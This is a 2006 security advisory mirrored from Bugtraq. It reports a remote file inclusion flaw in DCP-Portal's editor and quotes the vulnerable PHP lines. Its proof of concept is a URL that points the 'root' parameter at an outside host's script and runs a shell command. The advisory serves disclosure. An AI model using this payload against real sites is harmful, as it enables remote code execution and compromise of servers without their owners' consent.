The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


[Kurdish Security # 8] DCP-Portal Remote File Include


<< Previous INDEX Search src / Print Next >>
Date: 13 Jun 2006 08:30:35 -0000
From: botan@linuxmail.org
To: bugtraq@securityfocus.com
Subject: [Kurdish Security # 8] DCP-Portal Remote File Include
 Vulnerability [Editor DHTML]
X-Virus-Scanned: antivirus-gw at tyumen.ru

# Kurdish Security Advisory
# irc.gigachat.net #kurdhack 
# http://www.milw0rm.com/exploits/1905
# Editor DHTML Scripting bugz 

$url_path_editor = "$root_url/library/editor/"; 
$abs_path_editor = "$root/library/editor/"; 

?>

Proof Of Concept 

http://www.site.com/[dcpath]/library/editor/editor.php?root=http://www.yourscripts.com/x.txt?cmd=id


<< Previous INDEX Search src / Print Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру